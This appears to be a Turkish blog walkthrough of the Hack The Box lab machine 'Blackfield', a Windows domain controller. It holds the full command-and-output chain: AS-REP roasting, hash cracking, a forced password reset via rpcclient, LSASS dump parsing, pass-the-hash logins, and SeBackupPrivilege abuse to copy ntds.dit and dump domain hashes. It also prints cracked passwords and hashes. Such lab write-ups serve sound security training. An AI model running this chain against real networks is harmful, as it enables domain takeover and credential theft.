İçeriğe geç

Blackfield

Makine Adı Seviye OS Logo
Blackfield - HTB Zor Windows

Walkthrough

nmap taraması:

┌──(root💀kali)-[~]
└─# nmap 10.10.10.192 -p- -A -T4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 17:24 EDT
Nmap scan report for 10.10.10.192
Host is up (0.074s latency).
Not shown: 65526 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-09-27 05:29:12Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m54s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-09-27T05:30:08
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   74.20 ms 10.10.14.1
2   74.18 ms 10.10.10.192

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 240.87 seconds

Bir dc olduğu belli. Protokollere göre incelemeye başladım ilk olrak smb ile başladım.

┌──(root💀kali)-[~]                                                                                                     
└─# smbmap -H "10.10.10.192" -u 'a'                                                                              130 ⨯  
[+] Guest session       IP: 10.10.10.192:445    Name: 10.10.10.192                                                      
        Disk                                                    Permissions     Comment                                 
        ----                                                    -----------     -------                                 
        ADMIN$                                                  NO ACCESS       Remote Admin                            
        C$                                                      NO ACCESS       Default share                           
        forensic                                                NO ACCESS       Forensic / Audit share.                 
        IPC$                                                    READ ONLY       Remote IPC                              
        NETLOGON                                                NO ACCESS       Logon server share                      
        profiles$                                               READ ONLY                                               
        SYSVOL                                                  NO ACCESS       Logon server share                      

Daha iyi bir inceleme için mount etmeye karar verdim.


┌──(root💀kali)-[~]                                                                                                     
└─# mount -t cifs //10.10.10.192/profiles$ /mnt/10.10.10.192/profiles                                            130 ⨯  
Password for root@//10.10.10.192/profiles$: 

/mnt/10.10.10.192/profiles klasörünün altına gittiğimde bir sürü isim bulunmaktaydı bende bunları AD kullancısı olabilir diye düşünüp bir wordlist' aktardım.


┌──(root💀kali)-[/mnt/10.10.10.192/profiles]
└─# ls
AAlleni        BSamkoses       ETurgano           KAmavisca       MHoerauf        RNemnich      TKauten
ABarteski      BZandonella     EWojtila           KAtolikian      MKermarrec      RPoretsky     TKnupke
ABekesz        CAcherman       FAlirezai          KBrokinn        MKillberg       RStuehringer  TLintlop
ABenzies       CAkbari         FBaldwind          KCockeril       MLapesh         RSzewczuga    TMusselli
ABiemiller     CAldhowaihi     FBroj              KColtart        MMakhsous       RVallandas    TOust
AChampken      CArgyropolous   FDeblaquire        KCyster         MMerezio        RWeatherl     TSlupka
ACheretei      CDufrasne       FDegeorgio         KDorney         MNaciri         RWissor       TStausland
ACsonaki       CGronk          FianLaginja        KKoesno         MShanmugarajah  SAbdulagatov  TZumpella
AHigchens      Chiucarello     FLasokowski        KLangfur        MSichkar        SAjowi        UCrofskey
AJaquemai      Chiuccariello   FPflum             KMahalik        MTemko          SAlguwaihes   UMarylebone
AKlado         CHoytal         FReffey            KMasloch        MTipirneni      SBonaparte    UPyrke
AKoffenburger  CKijauskas      GaBelithe          KMibach         MTonuri         SBouzane      VBublavy
AKollolli      CKolbo          Gareld             KParvankova     MVanarsdel      SChatin       VButziger
AKruppe        CMakutenas      GBatowski          KPregnolato     NBellibas       SDellabitta   VFuscca
AKubale        CMorcillo       GForshalger        KRasmor         NDikoka         SDhodapkar    VLitschauer
ALamerz        CSchandall      GGomane            KShievitz       NGenevro        SEulert       VMamchuk
AMaceldon      CSelters        GHisek             KSojdelius      NGoddanti       SFadrigalan   VMarija
AMasalunga     CTolmie         GMaroufkhani       KTambourgi      NMrdirk         SGolds        VOlaosun
ANavay         DCecere         GMerewether        KVlahopoulos    NPulido         SGrifasi      VPapalouca
ANesterova     DChintalapalli  GQuinniey          KZyballa        NRonges         SGtlinas      WSaldat
ANeusse        DCwilich        GRoswurm           LBajewsky       NSchepkie       SHauht        WVerzhbytska
AOkleshen      DGarbatiuc      GWiegard           LBaligand       NVanpraet       SHederian     WZelazny
APustulka      DKemesies       HBlaziewske        LBarhamand      OBelghazi       SHelregel     XBemelen
ARotella       DMatuka         HColantino         LBirer          OBushey         SKrulig       XDadant
ASanwardeker   DMedeme         HConforto          LBobelis        OHardybala      SLewrie       XDebes
AShadaia       DMeherek        HCunnally          LChippel        OLunas          SMaskil       XKonegni
ASischo        DMetych         HGougen            LChoffin        ORbabka         Smocker       XRykiel
ASpruce        DPaskalev       HKostova           LCominelli      PBourrat        SMoyta        YBleasdale
ATakach        DPriporov       IChristijr         LDruge          PBozzelle       SRaustiala    YHuftalin
ATaueg         DRusanovskaya   IKoledo            LEzepek         PBranti         SReppond      YKivlen
ATwardowski    DVellela        IKotecky           LHyungkim       PCapperella     SSicliano     YKozlicki
audit2020      DVogleson       ISantosi           LKarabag        PCurtz          SSilex        YNyirenda
AWangenheim    DZwinak         JAngvall           LKirousis       PDoreste        SSolsbak      YPredestin
AWorsey        EBoley          JBehmoiras         LKnade          PGegnas         STousignaut   YSeturino
AZigmunt       EEulau          JDanten            LKrioua         PMasulla        support       YSkoropada
BBakajza       EFeatherling    JDjouka            LLefebvre       PMendlinger     svc_backup    YVonebers
BBeloucif      EFrixione       JKondziola         LLoeradeavilez  PParakat        SWhyte        YZarpentine
BCarmitcheal   EJenorik        JLeytushsenior     LMichoud        PProvencer      SWynigear     ZAlatti
BConsultant    EKmilanovic     JLuthner           LTindall        PTesik          TAwaysheh     ZKrenselewski
BErdossy       ElKatkowsky     JMoorehendrickson  LYturbe         PVinkovich      TBadenbach    ZMalaab
BGeminski      EmaCaratenuto   JPistachio         MArcynski       PVirding        TCaffo        ZMiick
BLostal        EPalislamovic   JScima             MAthilakshmi    PWeinkaus       TCassalom     ZScozzari
BMannise       EPryar          JSebaali           MAttravanam     RBaliukonis     TEiselt       ZTimofeeff
BNovrotsky     ESachhitello    JShoenherr         MBrambini       RBochare        TFerencdo     ZWausik
BRigiero       ESariotti       JShuselvt          MHatziantoniou  RKrnjaic        TGaleazza

┌──(root💀kali)-[/mnt/10.10.10.192/profiles]
└─# ls > /home/kali/Desktop/HTB/Windows/10.10.10.192/users

Daha sonrasında akıma as-reproast saldırısı geldi ve denedim.

┌──(root💀kali)-[/home/…/HTB/Windows/10.10.10.192/test]                                                                 
└─# crackmapexec ldap 10.10.10.192 -u ../users -p '' --asreproast result --kdcHost 10.10.10.192                    1 ⨯  
LDAP        10.10.10.192    389    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.192    389    DC01             [email protected]:baddce346affba1e06d1527007250944$38fdb239c4eeca072445d1d99b9992de43bc0cca30e5c235742537bc6b49b9295cafbf5c095cb77692aa6fb14ac895d38ef154b11615252d38
cfafb35764215b9d8bdc0119160e653cfdc1a4afb6938eb96fa3643cef14d968838de93c17839bc3b2713f7cda9f26cfb62df588786972bf08327f5ae497bc80b6621b0ad0fa0ad9d5c6a6cc1c323f6402834f087fef27bcf6b491cc11255ffe1f53b7d2f3467a26f9ac2cc654deba2500d2fc0f690091
856ed4758ea4e3a2ed0b3ceb2f1abdb1b3ba12a753d6a0bcd11d74ee7ee3a7dc3163c7b62fc0db8361f565566368e6ba1d8b638eba65bd8d546d3d88d93ffd0749a9ab1e

Harika! Daha sonra bu hashi kırdım.

┌──(root💀kali)-[/home/…/HTB/Windows/10.10.10.192/hash]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ([email protected])
1g 0:00:00:12 DONE (2021-09-26 18:31) 0.07710g/s 1105Kp/s 1105Kc/s 1105KC/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Artık bir credentiala sahibim ve bununla birlikte ldap aracılığıyla bloodhound çalıştırabilirim.

┌──(root💀kali)-[/home/…/HTB/Windows/10.10.10.192/blood]                                                               
└─# bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all                                                                                                                                       130 ⨯ 
INFO: Found AD domain: blackfield.local                                                                                                                                                                                                       
INFO: Connecting to LDAP server: dc01.blackfield.local                                                                                                                                                                                        
INFO: Found 1 domains                                     
INFO: Found 1 domains in the forest                                                                                                                                                                                                           
INFO: Found 18 computers                                                                                                                                                                                                                      
INFO: Connecting to LDAP server: dc01.blackfield.local                                                                                                                                                                                        
INFO: Found 315 users                                                                                                  
INFO: Connecting to GC LDAP server: dc01.blackfield.local                                                                                                                                                                                     
INFO: Found 51 groups                                                                                                                                                                                                                         
INFO: Found 0 trusts                                                                                                                                                                                                                          
INFO: Starting computer enumeration with 10 workers                                                                    
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 14S

Sonuçlara bakarken aşağıdaki sonucu buldum. audit2020 kullanıcısının paroalsını direkt olarak değiştirebiliyorum. Harika! Bunun için rpc'yi kullandım. Daha ayrntılı bilgi için buradaki kopya kağıdı incelenebilir.

(https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf)

Kullanıcının paroalsını değiştirdim.

                                                                                                               │
┌──(root💀kali)-[~]                                                                                                    │
└─# rpcclient 10.10.10.192 -U support                                                                                  │
                                                                                                                   1 ⨯ │
Enter WORKGROUP\support's password:                                                                                    │
rpcclient $> chgpasswd3 audit2020                                                                                      │
Usage: chgpasswd3 username oldpass newpass                                                                             │
result was NT_STATUS_INVALID_PARAMETER                                                                                 │
rpcclient $> setuserinfo2 audit2020 24 'Password1'                                                                     │
rpcclient $>                
┌──(root💀kali)-[/home/…/Windows/10.10.10.192/blood/adit]
└─# crackmapexec ldap 10.10.10.192 -u audit2020 -p 'Password1' --kdcHost 10.10.10.192 
LDAP        10.10.10.192    389    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.192    389    DC01             [+] BLACKFIELD.local\audit2020:Password1 

┌──(root💀kali)-[/home/…/Windows/10.10.10.192/blood/adit]
└─# bloodhound-python -u audit2020 -p 'Password1' -ns 10.10.10.192 -d blackfield.local -c all    

INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 315 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 14S

Onunlada bloodhound attım ancak pek işe yarar sonuç gelmedi. winrm ile bağlantıda kuramıyordum. Bunun üzerine tekrara smb'ye baktım.

┌──(root💀kali)-[~]
└─# crackmapexec smb 10.10.10.192 -u audit2020 -p Password1 --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Password1 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 

lsass process'inin dump'ını aldım.

┌──(root💀kali)-[/home/…/Desktop/HTB/Windows/10.10.10.192]
└─# smbclient -U audit2020 \\\\10.10.10.192\\forensic
Enter WORKGROUP\audit2020's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

                7846143 blocks of size 4096. 4107878 blocks available
smb: \> cd memory_analysis
smb: \memory_analysis\> ls
  .                                   D        0  Thu May 28 16:28:33 2020
  ..                                  D        0  Thu May 28 16:28:33 2020
  conhost.zip                         A 37876530  Thu May 28 16:25:36 2020
  ctfmon.zip                          A 24962333  Thu May 28 16:25:45 2020
  dfsrs.zip                           A 23993305  Thu May 28 16:25:54 2020
  dllhost.zip                         A 18366396  Thu May 28 16:26:04 2020
  ismserv.zip                         A  8810157  Thu May 28 16:26:13 2020
  lsass.zip                           A 41936098  Thu May 28 16:25:08 2020
  mmc.zip                             A 64288607  Thu May 28 16:25:25 2020
  RuntimeBroker.zip                   A 13332174  Thu May 28 16:26:24 2020
  ServerManager.zip                   A 131983313  Thu May 28 16:26:49 2020
  sihost.zip                          A 33141744  Thu May 28 16:27:00 2020
  smartscreen.zip                     A 33756344  Thu May 28 16:27:11 2020
  svchost.zip                         A 14408833  Thu May 28 16:27:19 2020
  taskhostw.zip                       A 34631412  Thu May 28 16:27:30 2020
  winlogon.zip                        A 14255089  Thu May 28 16:27:38 2020
  wlms.zip                            A  4067425  Thu May 28 16:27:44 2020
  WmiPrvSE.zip                        A 18303252  Thu May 28 16:27:53 2020

                7846143 blocks of size 4096. 4107878 blocks available
smb: \memory_analysis\> get lsass.zip
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (2605.7 KiloBytes/sec) (average 2605.7 KiloBytes/sec)
smb: \memory_analysis\> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
┌──(root💀kali)-[/home/…/Desktop/HTB/Windows/10.10.10.192]                                                                                                                                                                                    └─# pypykatz lsa minidump lsass.DMP                                                                                                                                                                                                           
INFO:root:Parsing file lsass.DMP                                                                                                                                                                                                              
FILE: ======== lsass.DMP =======                                                                                                                                                                                                              
== LogonSession ==                                                                                                                                                                                                                            
authentication_id 406458 (633ba)                                                                                                                                                                                                              
session_id 2                                                                                                                                                                                                                                  
username svc_backup                                                                                                                                                                                                                           
domainname BLACKFIELD                                                                                                                                                                                                                         
logon_server DC01                                                                                                                                                                                                                             
logon_time 2020-02-23T18:00:03.423728+00:00                                                                                                                                                                                                   
sid S-1-5-21-4194615774-2175524697-3563712290-1413                                                                                                                                                                                            
luid 406458                                                                                                                                                                                                                                   
        == MSV ==                                                                                                                                                                                                                             
                Username: svc_backup                                                                                                                                                                                                          
                Domain: BLACKFIELD                                                                                                                                                                                                            
                LM: NA                                                                                                                                                                                                                        
                NT: 9658d1d1dcd9250115e2205d9f48400d                                                                                                                                                                                          
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c                                                                                                                                                                                
        == WDIGEST [633ba]==                                                                                                                                                                                                                  
                username svc_backup                                                                                                                                                                                                           
                domainname BLACKFIELD
                password None
        == SSP [633ba]==
                username 
                domainname 
                password None
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
                Password: None
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
...
...

Daha sonrasında oradan svc_backup kullanıcısının ntlm hash'ini aldım. Artık makineye bağlantı kurabiliyorum.

┌──(root💀kali)-[~]                                                                                                    
└─# evil-winrm -i 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'                                     

Evil-WinRM shell v3.3                                                                                                  

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion  

Info: Establishing connection to remote endpoint                                                                       

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cat ../Desktop/user.txt                                                 
3920bb317a0bef51027e2852be64b543                                                                                       
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv                                                                                                                                                                                   

PRIVILEGES INFORMATION                                                                                                 
----------------------                                                                                                                                                                                                                        

Privilege Name                Description                    State                                                     
============================= ============================== =======                                                   
SeMachineAccountPrivilege     Add workstations to domain     Enabled                                                                                                                                                                          
SeBackupPrivilege             Back up files and directories  Enabled                                                                                                                                                                          
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled                                                                                                                                                                          
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                                                                                                                                          
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled       

SeBackupPrivilege grubuna üyeysek makine içerisindeki bütün dosyaları yedekleyebiliriz anlamına geliyor eğer bu makine bir DC ise ntds, eğer bir client windows 10'sa sam dosyası gibi dosyalarda dahil olmak üzere. https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960 adresinde aslında nasıl exploit edileceği anlatılmış. Bizde aynı yönergeleri izleyeceğiz.

                                        1 ⨯

┌──(root💀kali)-[/home/…/Desktop/HTB/Windows/10.10.10.192]
└─# cat back_script.txt                                                                                         130 ⨯
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

┌──(root💀kali)-[/home/…/Desktop/HTB/Windows/10.10.10.192]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.192 - - [27/Sep/2021 11:27:49] "GET /back_script.txt HTTP/1.1" 200 -

E diskini oluşturduk ve işlemlerimize artık oradan devam edeceğiz. Bu dosyayı windows'a kopyalamalıyız. Bunun için ben bir http sunucusu oluşturdum.


*Evil-WinRM* PS C:\Users\svc_backup\Documents> Invoke-WebRequest -Uri http://10.10.14.20/back_script.txt -OutFile C:\Us  
ers\svc_backup\Documents\back_script.txt   

*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s back_script.txt                                             
Microsoft DiskShadow version 1.0                                                                                         
Copyright (C) 2013 Microsoft Corporation                                                                                 
On computer:  DC01,  9/27/2021 4:30:13 PM                                                                                

-> set verbose on                                                                                                        
-> set metadata C:\Windows\Temp\meta.cab                                                                                 
-> set context clientaccessible                                                                                          
-> set context persistent                                                                                                
-> begin backup                                                                                                          
-> add volume C: alias cdrive                                                                                            
-> create                                                                                                                
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.                    
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,                                                   
because it requires volume  which is not in the shadow copy set.                                                         
The writer "ASR Writer" is now entirely excluded from the backup because the top-level                                   
non selectable component "\BCD\BCD" is excluded.                                                                         

* Including writer "Task Scheduler Writer":                                                                              
        + Adding component: \TasksStore                                                                                  

* Including writer "VSS Metadata Store Writer":                                                                          
        + Adding component: \WriterMetadataStore                                                                         

* Including writer "Performance Counters Writer":                                                                        
        + Adding component: \PerformanceCounters                                                                         
...
...
*Evil-WinRM* PS C:\Users\svc_backup\Documents> robocopy /b E:\Windows\ntds . ntds.dit                                    

-------------------------------------------------------------------------------                                          
   ROBOCOPY     ::     Robust File Copy for Windows                                                                      
-------------------------------------------------------------------------------                                          

  Started : Monday, September 27, 2021 4:32:15 PM                                                                        
   Source : E:\Windows\ntds\                                                                                             
     Dest : C:\Users\svc_backup\Documents\                                                                               

    Files : ntds.dit                                                                                                     

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30                                                                      

------------------------------------------------------------------------------                                           

                           1    E:\Windows\ntds\                                                                         
            New File              18.0 m        ntds.dit                                                                 
  0.0%                                                                                                                   
  0.3%
  ...
  ...
  100%
  ```

```sh

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system C:\Users\svc_backup\Documents\system.bak             
The operation completed successfully.  

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit                                                         
Info: Downloading ntds.dit to ./ntds.dit                                                                                 

Info: Download successful!     
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.bak                                                       
Info: Downloading system.bak to ./system.bak                                                                             

Info: Download successful!

Dosyaları elde ettiten sonra credentialları okudum.


┌──(root💀kali)-[/usr/share/doc/python3-impacket/examples]                                                                                                                                                                                    
└─# python3 secretsdump.py -ntds /root/ntds.dit -system /root/system.bak local                                                                                                                                                                
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation                                                                                                                                                                                      

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393                                                                                                                                                                                 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                                                                                                 
[*] Searching for pekList, be patient                                                                                                                                                                                                         
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c                                                                                                                                                                             
[*] Reading and decrypting hashes from /root/ntds.dit                                                                                                                                                                                         
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::                                                                                                                                                        
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                                                                                                
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:5d27ca03d3f067ec45c2d2800a12b409:::                                                                                                                                                               
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::                                                                                                                                                               
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::                                                                                                                                                           
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::    
...
...
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.10.192 -u Administrator -H '184fb5e5178480be64824d4cd53b99ee'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2020   4:36 PM            447 notes.txt
-a----        11/5/2020   8:38 PM             32 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
4375a629c7c67c8e29db269060c955cb
Kategori:Active DirectoryWalkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir